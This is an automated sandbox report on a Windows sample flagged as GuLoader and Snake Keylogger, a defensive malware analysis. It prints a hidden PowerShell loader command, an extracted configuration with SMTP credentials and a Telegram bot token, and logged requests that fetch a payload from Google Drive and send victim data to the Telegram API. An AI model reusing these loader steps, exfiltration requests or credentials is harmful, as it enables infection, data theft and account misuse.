Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
4Vx2rUlb0f.exe

Overview

General Information

Sample name:4Vx2rUlb0f.exe
renamed because original name is a hash value
Original sample name:8806ce311854fa80261e855453c07d30b43a24d413c65cdfaae99024408bd6ff.exe
Analysis ID:1588252
MD5:a1204c6a7fe28bab5db0e3240513a857
SHA1:909f041efc5859b43f547017085e3cf39a05a4fa
SHA256:8806ce311854fa80261e855453c07d30b43a24d413c65cdfaae99024408bd6ff
Tags:exeuser-adrian__luca
Infos:

Detection

GuLoader, Snake Keylogger
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Early bird code injection technique detected
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected GuLoader
Yara detected Snake Keylogger
AI detected suspicious sample
Found suspicious powershell code related to unpacking or dynamic code loading
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Powershell drops PE file
Queues an APC in another process (thread injection)
Suspicious powershell command line found
Tries to detect the country of the analysis system (by using the IP)
Uses the Telegram API (likely for C&C communication)
Writes to foreign memory regions
Abnormal high CPU Usage
Contains functionality for read data from the clipboard
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Msiexec Initiated Connection
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection

Classification

  • System is w10x64
  • 4Vx2rUlb0f.exe (PID: 7544 cmdline: "C:\Users\user\Desktop\4Vx2rUlb0f.exe" MD5: A1204C6A7FE28BAB5DB0E3240513A857)
    • powershell.exe (PID: 7576 cmdline: powershell.exe -windowstyle hidden "$Baarebukets=gc -raw 'C:\Users\user\AppData\Local\neoimpressionism\Andengenerationsindvandrer\prelusory.Tuk206';$Figura=$Baarebukets.SubString(29776,3);.$Figura($Baarebukets) " MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7584 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • msiexec.exe (PID: 3192 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
NameDescriptionAttributionBlogpost URLsLink
404 Keylogger, Snake KeyloggerSnake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger
{"Exfil Mode": "Telegram", "Username": "abraher@abraher.com", "Password": "General1", "Host": "mail.abraher.com", "Port": "587", "Token": "8101497037:AAEvNeES2X17rekW3womq6JjOwgZLJMqX1Y", "Chat_id": "7171338311", "Version": "4.4"}
SourceRuleDescriptionAuthorStrings
00000007.00000002.3052249542.0000000025251000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
    00000001.00000002.2706856166.000000000A8B3000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security

      System Summary

      barindex
      Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 142.250.185.206, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\msiexec.exe, Initiated: true, ProcessId: 3192, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 50002
      Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7576, TargetFilename: C:\Users\user\AppData\Local\neoimpressionism\Andengenerationsindvandrer\4Vx2rUlb0f.exe
      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell.exe -windowstyle hidden "$Baarebukets=gc -raw 'C:\Users\user\AppData\Local\neoimpressionism\Andengenerationsindvandrer\prelusory.Tuk206';$Figura=$Baarebukets.SubString(29776,3);.$Figura($Baarebukets) ", CommandLine: powershell.exe -windowstyle hidden "$Baarebukets=gc -raw 'C:\Users\user\AppData\Local\neoimpressionism\Andengenerationsindvandrer\prelusory.Tuk206';$Figura=$Baarebukets.SubString(29776,3);.$Figura($Baarebukets) ", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\4Vx2rUlb0f.exe", ParentImage: C:\Users\user\Desktop\4Vx2rUlb0f.exe, ParentProcessId: 7544, ParentProcessName: 4Vx2rUlb0f.exe, ProcessCommandLine: powershell.exe -windowstyle hidden "$Baarebukets=gc -raw 'C:\Users\user\AppData\Local\neoimpressionism\Andengenerationsindvandrer\prelusory.Tuk206';$Figura=$Baarebukets.SubString(29776,3);.$Figura($Baarebukets) ", ProcessId: 7576, ProcessName: powershell.exe
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2025-01-10T23:11:28.215808+010028033053Unknown Traffic192.168.2.450006104.21.112.1443TCP
      2025-01-10T23:11:36.178494+010028033053Unknown Traffic192.168.2.450018104.21.112.1443TCP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2025-01-10T23:11:26.480660+010028032742Potentially Bad Traffic192.168.2.450004132.226.247.7380TCP
      2025-01-10T23:11:27.668006+010028032742Potentially Bad Traffic192.168.2.450004132.226.247.7380TCP
      2025-01-10T23:11:28.949280+010028032742Potentially Bad Traffic192.168.2.450007132.226.247.7380TCP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2025-01-10T23:11:20.954898+010028032702Potentially Bad Traffic192.168.2.450002142.250.185.206443TCP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2025-01-10T23:11:38.423143+010018100071Potentially Bad Traffic192.168.2.450021149.154.167.220443TCP

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Source: 00000007.00000002.3052249542.0000000025251000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Snake Keylogger {"Exfil Mode": "Telegram", "Username": "abraher@abraher.com", "Password": "General1", "Host": "mail.abraher.com", "Port": "587", "Token": "8101497037:AAEvNeES2X17rekW3womq6JjOwgZLJMqX1Y", "Chat_id": "7171338311", "Version": "4.4"}
      Source: C:\Users\user\AppData\Local\neoimpressionism\Andengenerationsindvandrer\4Vx2rUlb0f.exeReversingLabs: Detection: 65%
      Source: 4Vx2rUlb0f.exeVirustotal: Detection: 75%Perma Link
      Source: 4Vx2rUlb0f.exeReversingLabs: Detection: 65%
      Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.7% probability
      Source: C:\Users\user\AppData\Local\neoimpressionism\Andengenerationsindvandrer\4Vx2rUlb0f.exeJoe Sandbox ML: detected
      Source: 4Vx2rUlb0f.exeJoe Sandbox ML: detected

      Location Tracking

      barindex
      Source: unknownDNS query: name: reallyfreegeoip.org
      Source: 4Vx2rUlb0f.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
      Source: unknownHTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.4:50005 version: TLS 1.0
      Source: unknownHTTPS traffic detected: 142.250.185.206:443 -> 192.168.2.4:50002 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.184.193:443 -> 192.168.2.4:50003 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50021 version: TLS 1.2
      Source: 4Vx2rUlb0f.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
      Source: Binary string: \System.Core.pdb-2X3 source: powershell.exe, 00000001.00000002.2705239061.00000000085FC000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: s\System.Core.pdb source: powershell.exe, 00000001.00000002.2705239061.00000000085FC000.00000004.00000020.00020000.00000000.sdmp
      Source: C:\Users\user\Desktop\4Vx2rUlb0f.exeCode function: 0_2_00405841 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405841
      Source: C:\Users\user\Desktop\4Vx2rUlb0f.exeCode function: 0_2_004027FB FindFirstFileW,0_2_004027FB
      Source: C:\Users\user\Desktop\4Vx2rUlb0f.exeCode function: 0_2_00406393 FindFirstFileW,FindClose,0_2_00406393
      Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 02FEF45Dh7_2_02FEF2C0
      Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 02FEF45Dh7_2_02FEF4AC

      Networking

      barindex
      Source: Network trafficSuricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.4:50021 -> 149.154.167.220:443
      Source: unknownDNS query: name: api.telegram.org
      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:210979%0D%0ADate%20and%20Time:%2011/01/2025%20/%2004:46:37%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20210979%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
      Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
      Source: Joe Sandbox ViewIP Address: 104.21.112.1 104.21.112.1
      Source: Joe Sandbox ViewIP Address: 132.226.247.73 132.226.247.73
      Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
      Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
      Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
      Source: unknownDNS query: name: checkip.dyndns.org
      Source: unknownDNS query: name: reallyfreegeoip.org
      Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:50007 -> 132.226.247.73:80
      Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:50004 -> 132.226.247.73:80
      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:50006 -> 104.21.112.1:443
      Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:50002 -> 142.250.185.206:443
      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:50018 -> 104.21.112.1:443
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1tTuCtWc8QWxmudjTRrFkrhq7MJC0UzWJ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /download?id=1tTuCtWc8QWxmudjTRrFkrhq7MJC0UzWJ&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
      Source: unknownHTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.4:50005 version: TLS 1.0
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1tTuCtWc8QWxmudjTRrFkrhq7MJC0UzWJ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /download?id=1tTuCtWc8QWxmudjTRrFkrhq7MJC0UzWJ&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:210979%0D%0ADate%20and%20Time:%2011/01/2025%20/%2004:46:37%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20210979%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
      Source: msiexec.exe, 00000007.00000003.2829735978.000000000966E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: g*.google.com*.appengine.google.com*.bdn.dev*.origin-test.bdn.dev*.cloud.google.com*.crowdsource.google.com*.datacompute.google.com*.google.ca*.google.cl*.google.co.in*.google.co.jp*.google.co.uk*.google.com.ar*.google.com.au*.google.com.br*.google.com.co*.google.com.mx*.google.com.tr*.google.com.vn*.google.de*.google.es*.google.fr*.google.hu*.google.it*.google.nl*.google.pl*.google.pt*.googleapis.cn*.googlevideo.com*.gstatic.cn*.gstatic-cn.comgooglecnapps.cn*.googlecnapps.cngoogleapps-cn.com*.googleapps-cn.comgkecnapps.cn*.gkecnapps.cngoogledownloads.cn*.googledownloads.cnrecaptcha.net.cn*.recaptcha.net.cnrecaptcha-cn.net*.recaptcha-cn.netwidevine.cn*.widevine.cnampproject.org.cn*.ampproject.org.cnampproject.net.cn*.ampproject.net.cngoogle-analytics-cn.com*.google-analytics-cn.comgoogleadservices-cn.com*.googleadservices-cn.comgooglevads-cn.com*.googlevads-cn.comgoogleapis-cn.com*.googleapis-cn.comgoogleoptimize-cn.com*.googleoptimize-cn.comdoubleclick-cn.net*.doubleclick-cn.net*.fls.doubleclick-cn.net*.g.doubleclick-cn.netdoubleclick.cn*.doubleclick.cn*.fls.doubleclick.cn*.g.doubleclick.cndartsearch-cn.net*.dartsearch-cn.netgoogletraveladservices-cn.com*.googletraveladservices-cn.comgoogletagservices-cn.com*.googletagservices-cn.comgoogletagmanager-cn.com*.googletagmanager-cn.comgooglesyndication-cn.com*.googlesyndication-cn.com*.safeframe.googlesyndication-cn.comapp-measurement-cn.com*.app-measurement-cn.comgvt1-cn.com*.gvt1-cn.comgvt2-cn.com*.gvt2-cn.com2mdn-cn.net*.2mdn-cn.netgoogleflights-cn.net*.googleflights-cn.netadmob-cn.com*.admob-cn.comgooglesandbox-cn.com*.googlesandbox-cn.com*.safenup.googlesandbox-cn.com*.gstatic.com*.metric.gstatic.com*.gvt1.com*.gcpcdn.gvt1.com*.gvt2.com*.gcp.gvt2.com*.url.google.com*.youtube-nocookie.com*.ytimg.comandroid.com*.android.com*.flash.android.comg.cn*.g.cng.co*.g.cogoo.glwww.goo.glgoogle-analytics.com*.google-analytics.comgoogle.comgooglecommerce.com*.googlecommerce.comggpht.cn*.ggpht.cnurchin.com*.urchin.comyoutu.beyoutube.com*.youtube.commusic.youtube.com*.music.youtube.comyoutubeeducation.com*.youtubeeducation.comyoutubekids.com*.youtubekids.comyt.be*.yt.beandroid.clients.google.com*.android.google.cn*.chrome.google.cn*.developers.google.cn equals www.youtube.com (Youtube)
      Source: global trafficDNS traffic detected: DNS query: drive.google.com
      Source: global trafficDNS traffic detected: DNS query: drive.usercontent.google.com
      Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
      Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
      Source: global trafficDNS traffic detected: DNS query: api.telegram.org
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Fri, 10 Jan 2025 22:11:38 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
      Source: msiexec.exe, 00000007.00000002.3052249542.0000000025420000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.org
      Source: msiexec.exe, 00000007.00000002.3052249542.000000002539E000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.3052249542.00000000253BA000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.3052249542.00000000253AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.com
      Source: msiexec.exe, 00000007.00000002.3052249542.000000002534E000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.3052249542.000000002539E000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.3052249542.00000000253BA000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.3052249542.00000000253AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
      Source: msiexec.exe, 00000007.00000002.3053757639.0000000027583000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
      Source: 4Vx2rUlb0f.exe, 00000000.00000000.1784950404.000000000040A000.00000008.00000001.01000000.00000003.sdmp, 4Vx2rUlb0f.exe, 00000000.00000002.1829718865.000000000040A000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
      Source: powershell.exe, 00000001.00000002.2698155602.0000000005E7C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
      Source: powershell.exe, 00000001.00000002.2693602382.0000000004F66000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
      Source: msiexec.exe, 00000007.00000002.3052249542.000000002539E000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.3052249542.00000000253BA000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.3052249542.00000000253AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://reallyfreegeoip.org
      Source: powershell.exe, 00000001.00000002.2693602382.0000000004F66000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
      Source: powershell.exe, 00000001.00000002.2693602382.0000000004E11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
      Source: powershell.exe, 00000001.00000002.2693602382.0000000004F66000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
      Source: powershell.exe, 00000001.00000002.2693602382.0000000004F66000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
      Source: 4Vx2rUlb0f.exe, 00000000.00000002.1829896250.0000000000453000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://www.skinstudio.netG
      Source: powershell.exe, 00000001.00000002.2693602382.0000000004E11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
      Source: powershell.exe, 00000001.00000002.2693602382.0000000004F66000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelp
      Source: msiexec.exe, 00000007.00000002.3052249542.0000000025420000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
      Source: msiexec.exe, 00000007.00000002.3052249542.0000000025420000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
      Source: msiexec.exe, 00000007.00000002.3052249542.0000000025420000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
      Source: msiexec.exe, 00000007.00000002.3052249542.0000000025420000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:210979%0D%0ADate%20a
      Source: msiexec.exe, 00000007.00000002.3037606643.0000000009624000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2833538108.000000000963D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
      Source: powershell.exe, 00000001.00000002.2698155602.0000000005E7C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
      Source: powershell.exe, 00000001.00000002.2698155602.0000000005E7C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
      Source: powershell.exe, 00000001.00000002.2698155602.0000000005E7C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
      Source: msiexec.exe, 00000007.00000002.3037606643.00000000095CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/
      Source: msiexec.exe, 00000007.00000002.3037606643.00000000095CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1tTuCtWc8QWxmudjTRrFkrhq7MJC0UzWJ
      Source: msiexec.exe, 00000007.00000002.3037606643.0000000009639000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/
      Source: msiexec.exe, 00000007.00000002.3037606643.0000000009639000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/4
      Source: msiexec.exe, 00000007.00000002.3037606643.0000000009639000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/:
